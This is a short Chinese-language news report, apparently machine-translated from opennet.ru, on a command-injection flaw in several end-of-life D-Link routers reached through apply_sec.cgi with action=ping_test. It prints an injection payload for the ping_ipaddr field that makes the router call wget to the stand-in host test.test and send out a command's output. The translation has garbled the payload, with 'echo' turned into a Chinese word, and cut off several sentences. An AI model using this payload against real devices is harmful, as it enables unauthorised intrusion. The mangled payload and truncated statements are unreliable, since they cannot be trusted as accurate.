在 D-Link 无线路由器中
有趣的是,根据固件开发人员的说法,“ping_test”调用只能在身份验证后执行,但实际上无论登录到 Web 界面如何,它在任何情况下都会被调用。特别是,当访问 apply_sec.cgi 脚本并传递“action=ping_test”参数时,脚本会重定向到身份验证页面,但同时执行与 ping_test 相关的操作。为了执行该代码,ping_test 本身使用了另一个漏洞,该漏洞调用 ping 实用程序而没有正确检查发送用于测试的 IP 地址的正确性。例如,要调用 wget 实用程序并将“echo 1234”命令的结果传输到外部主机,只需指定参数“ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://” test.test/?$(回显1234)”。
该漏洞已在以下型号中得到官方确认:
- DIR-655 固件版本为 3.02b05 或更早版本;
- DIR-866L 固件版本为 1.03b04 或更早版本;
- DIR-1565 固件版本为 1.01 或更早版本;
- DIR-652(未提供有关有问题的固件版本的信息)
这些型号的支持期已经到期,因此 D-Link
后来发现该漏洞还存在
来源: opennet.ru